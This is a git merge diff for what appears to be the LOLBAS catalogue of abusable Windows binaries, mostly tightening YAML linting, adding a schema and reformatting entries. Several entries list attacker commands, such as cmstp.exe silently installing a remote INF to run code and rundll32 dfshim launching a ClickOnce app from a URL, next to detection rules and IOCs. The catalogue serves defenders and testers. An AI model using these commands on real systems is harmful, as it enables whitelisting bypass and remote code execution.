Merge remote-tracking branch 'upstream/master' into windows_11_sprint

2024-10-22 16:49:11 +02:00 · 2022-10-03 16:16:30 +01:00 · 2022-10-03 16:16:30 +01:00 · 67e1040172
commit 67e1040172
parent e1df4e9f83 da38f3d8ed
176 changed files with 502 additions and 341 deletions
--- a/.github/.yamllint
+++ b/.github/.yamllint
@ -4,12 +4,12 @@ yaml-files:
  - '*.yml'
 rules:
  new-line-at-end-of-file:
-    level: warning
+    level: error
  trailing-spaces:
-    level: warning
+    level: error
  line-length:
    level: warning
  new-lines:
-    level: warning
+    level: error
  indentation:
-    level: warning
+    level: error
--- a/.github/workflows/gh-pages.yml
+++ b/.github/workflows/gh-pages.yml
@ -16,7 +16,7 @@ jobs:

      - name: Change .yml to .md
        run: |
-          for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
+          for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
          mv yml/OSBinaries yml/Binaries
          mv yml/OSLibraries yml/Libraries
          mv yml/OSScripts yml/Scripts
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@ -1,19 +1,35 @@
 ---
-name: YAML Lint
-on:
-  push:
-    branches:
-      - master
-  pull_request:
-    branches:
-      - master
+name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
+on: [push,pull_request]

 jobs:
  lintFiles:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/checkout@v1
+      - uses: actions/checkout@v3
      - name: yaml-lint
        uses: ibiqlik/action-yamllint@v3
        with:
+          no_warnings: true
+          file_or_dir: yml/**/*.yml
          config_file: .github/.yamllint
+      - name: Validate OSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSBinaries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSLibraries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSLibraries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSScripts YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSScripts/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OtherMSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OtherMSBinaries/*.yml
+          schema: YML-Schema.yml
--- a/.github/yaml-lint-reviewdog.yml.bak
+++ b/.github/yaml-lint-reviewdog.yml.bak
@ -0,0 +1,35 @@
+---
+name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
+on: [pull_request]
+
+jobs:
+  lintFiles:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+      - name: Run yamllint
+        uses: reviewdog/action-yamllint@v1
+        with:
+          level: error
+          reporter: github-pr-review # Change reporter.
+          yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
+      - name: Validate OSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSBinaries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSLibraries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSLibraries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSScripts YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSScripts/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OtherMSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OtherMSBinaries/*.yml
+          schema: YML-Schema.yml
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
  - Person: Bart
    Handle: '@bartblaze'
---
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
@ -15,4 +15,3 @@ Full_Path:
  - Path: '%localappdata%\Whatsapp\Update.exe'
 Detection:
  - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---
--- a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
@ -25,4 +25,3 @@ Acknowledgement:
    Handle: '@@vysecurity'
  - Person: Adam (Internals)
    Handle: '@Hexacorn'
---
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
@ -0,0 +1,118 @@
+---
+type: map
+mapping:
+# Id field enhancement possibility commenting out for now
+#  "Id":
+#    type: str
+#    required: true
+#    pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
+  "Name":
+    type: str
+    required: true
+  "Description":
+    type: str
+    required: true
+  "Aliases":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Alias":
+            type: str
+            required: false
+  "Author":
+    type: str
+    required: true
+  "Created":
+    type: date
+    required: true
+  "Commands":
+    type: seq
+    required: true
+    sequence:
+      - type: map
+        mapping:
+          "Command":
+            type: str
+            required: true
+          "Description":
+            type: str
+            required: true
+          "Usecase":
+            type: str
+            required: true
+          "Category":
+            type: str
+            required: true
+            enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
+          "Privileges":
+            type: str
+            required: true
+          "MitreID":
+            type: str
+            required: true
+            pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
+          "OperatingSystem":
+            type: str
+            required: true
+  "Full_Path":
+    type: seq
+    required: true
+    sequence:
+      - type: map
+        mapping:
+          "Path":
+            type: str
+            required: true
+  "Code_Sample":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Code":
+            type: str
+  "Detection":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "IOC":
+            type: str
+          "Sigma":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "Analysis":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "Elastic":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "Splunk":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "BlockRule":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+  "Resources":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Link":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+  "Acknowledgement":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Person":
+            type: str
+          "Handle":
+            type: str
+            pattern: '^(@(\w){1,15})?$'
--- a/YML-Template.yml
+++ b/YML-Template.yml
@ -1,11 +1,15 @@
 ---
 Name: Binary.exe
 Description: Something general about the binary
+Aliases:  # Optional field if any common aliases exist of the binary with nearly the same functionality,
+  - Alias: Binary64.exe  # but for example, is built for different architecture.
 Author: The name of the person that created this file
 Created: YYYY-MM-DD (date the person created this file)
 Commands:
  - Command: The command
    Description: Description of the command
+    Aliases:
+      - An alias for the command (example: ProcDump.exe & ProcDump64.exe)
    Usecase: A description of the usecase
    Category: Execute
    Privileges: Required privs
--- a/yml/OSBinaries/AppInstaller.yml
+++ b/yml/OSBinaries/AppInstaller.yml
@ -20,4 +20,3 @@ Resources:
 Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
---
--- a/yml/OSBinaries/Aspnet_Compiler.yml
+++ b/yml/OSBinaries/Aspnet_Compiler.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: cpl
    Handle: '@cpl3h'
---
--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@ -23,7 +23,7 @@ Detection:
  - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
 Resources:
  - Link: https://freddiebarrsmith.com/at.txt
-  - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
+  - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
  - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
 Acknowledgement:
  - Person: 'Freddie Barr-Smith'
@ -34,4 +34,3 @@ Acknowledgement:
    Handle:
  - Person: 'Xabier Ugarte-Pedrero'
    Handle:
---
--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
@ -14,17 +14,14 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\Atbroker.exe
  - Path: C:\Windows\SysWOW64\Atbroker.exe
-Code_Sample:
- Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
- - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
+  - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
+  - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
+  - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
 Resources:
  - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
 Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
---
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@ -48,4 +48,3 @@ Acknowledgement:
    Handle: '@aionescu'
  - Person: Asif Matadar
    Handle: '@d1r4c'
---
--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@ -46,7 +46,7 @@ Detection:
  - IOC: bitsadmin creates new files
  - IOC: bitsadmin adds data to alternate data stream
 Resources:
-  - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
+  - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
  - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
 Acknowledgement:
@ -56,4 +56,3 @@ Acknowledgement:
    Handle: '@carnal0wnage'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Certoc.yml
+++ b/yml/OSBinaries/Certoc.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Ensar Samil
    Handle: '@sblmsrsn'
---
--- a/yml/OSBinaries/Certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: David Middlehurst
    Handle: '@dtmsecurity'
---
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@ -39,7 +39,7 @@ Commands:
    Privileges: User
    MitreID: T1140
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil --decodehex encoded_hexadecimal_InputFileName
+  - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
    Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
    Usecase: Decode files to evade defensive measures
    Category: Decode
@ -75,4 +75,3 @@ Acknowledgement:
  - Person: egre55
    Handle: '@egre55'
  - Person: Lior Adar
---
--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@ -21,17 +21,14 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\cmd.exe
  - Path: C:\Windows\SysWOW64\cmd.exe
-Code_Sample:
- Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- - IOC: cmd.exe executing files from alternate data streams.
- - IOC: cmd.exe creating/modifying file contents in an alternate data stream.
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
+  - IOC: cmd.exe executing files from alternate data streams.
+  - IOC: cmd.exe creating/modifying file contents in an alternate data stream.
 Resources:
  - Link: https://twitter.com/yeyint_mth/status/1143824979139579904
 Acknowledgement:
  - Person: r0lan
    Handle: '@yeyint_mth'
---
--- a/yml/OSBinaries/Cmdkey.yml
+++ b/yml/OSBinaries/Cmdkey.yml
@ -14,14 +14,11 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\cmdkey.exe
  - Path: C:\Windows\SysWOW64\cmdkey.exe
-Code_Sample:
- Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
 Resources:
  - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
  - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Cmdl32.yml
+++ b/yml/OSBinaries/Cmdl32.yml
@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@ -14,24 +14,22 @@ Commands:
  - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
    Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
    Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
-    Category: AwL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\cmstp.exe
  - Path: C:\Windows\SysWOW64\cmstp.exe
-Code_Sample:
-  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
- - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
- - IOC: Execution of cmstp.exe without a VPN use case is suspicious
- - IOC: DotNet CLR libraries loaded into cmstp.exe
- - IOC: DotNet CLR Usage Log - cmstp.exe.log
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
+  - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
+  - IOC: Execution of cmstp.exe without a VPN use case is suspicious
+  - IOC: DotNet CLR libraries loaded into cmstp.exe
+  - IOC: DotNet CLR Usage Log - cmstp.exe.log
 Resources:
  - Link: https://twitter.com/NickTyrer/status/958450014111633408
  - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
@ -44,4 +42,3 @@ Acknowledgement:
    Handle: '@oddvarmoe'
  - Person: Nick Tyrer
    Handle: '@NickTyrer'
---
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@ -29,4 +29,3 @@ Resources:
 Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'
---
--- a/yml/OSBinaries/Conhost.yml
+++ b/yml/OSBinaries/Conhost.yml
@ -24,4 +24,3 @@ Acknowledgement:
    Handle: '@hexacorn'
  - Person: Wietze
    Handle: '@wietze'
---
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@ -15,16 +15,16 @@ Full_Path:
  - Path: C:\Windows\System32\control.exe
  - Path: C:\Windows\SysWOW64\control.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- - IOC: Control.exe executing files from alternate data streams
- - IOC: Control.exe executing library file without cpl extension
- - IOC: Suspicious network connections from control.exe
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
+  - IOC: Control.exe executing files from alternate data streams
+  - IOC: Control.exe executing library file without cpl extension
+  - IOC: Suspicious network connections from control.exe
 Resources:
  - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
  - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Csc.yml
+++ b/yml/OSBinaries/Csc.yml
@ -22,16 +22,15 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
- - IOC: Csc.exe should normally not run as System account unless it is used for development.
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
+  - IOC: Csc.exe should normally not run as System account unless it is used for development.
 Resources:
  - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@ -15,22 +15,21 @@ Full_Path:
  - Path: C:\Windows\System32\cscript.exe
  - Path: C:\Windows\SysWOW64\cscript.exe
 Code_Sample:
- - Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
- - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- - IOC: Cscript.exe executing files from alternate data streams
- - IOC: DotNet CLR libraries loaded into cscript.exe
- - IOC: DotNet CLR Usage Log - cscript.exe.log
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
+  - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - IOC: Cscript.exe executing files from alternate data streams
+  - IOC: DotNet CLR libraries loaded into cscript.exe
+  - IOC: DotNet CLR Usage Log - cscript.exe.log
 Resources:
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/CustomShellHost.yml
+++ b/yml/OSBinaries/CustomShellHost.yml
@ -0,0 +1,23 @@
+---
+Name: CustomShellHost.exe
+Description: A host process that is used by custom shells when using Windows in Kiosk mode.
+Author: 'Wietze Beukema'
+Created: 2021-11-14
+Commands:
+  - Command: CustomShellHost.exe
+    Description: Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.
+    Usecase: Can be used to evade defensive counter-measures
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Windows\System32\CustomShellHost.exe
+Detection:
+  - IOC: CustomShellHost.exe is unlikely to run on normal workstations
+Resources:
+  - Link: https://twitter.com/YoSignals/status/1381353520088113154
+  - Link: https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher
+Acknowledgement:
+  - Person: John Carroll
+    Handle: '@YoSignals'
--- a/yml/OSBinaries/DataSvcUtil.yml
+++ b/yml/OSBinaries/DataSvcUtil.yml
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'
---
--- a/yml/OSBinaries/Desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Gal Kristal
    Handle: '@gal_kristal'
---
--- a/yml/OSBinaries/DeviceCredentialDeployment.yml
+++ b/yml/OSBinaries/DeviceCredentialDeployment.yml
@ -0,0 +1,20 @@
+---
+Name: DeviceCredentialDeployment.exe
+Description: Device Credential Deployment
+Author: 'Elliot Killick'
+Created: '2021-08-16'
+Commands:
+  - Command: DeviceCredentialDeployment
+    Description: Grab the console window handle and set it to hidden
+    Usecase: Can be used to stealthily run a console application (e.g. cmd.exe) in the background
+    Category: Conceal
+    Privileges: User
+    MitreID: T1564
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\Windows\System32\DeviceCredentialDeployment.exe
+Detection:
+  - IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation
+Acknowledgement:
+  - Person: Elliot Killick
+    Handle: '@elliotkillick'
--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@ -7,7 +7,7 @@ Commands:
  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
    Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
    Usecase: Use binary to bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -17,13 +17,12 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
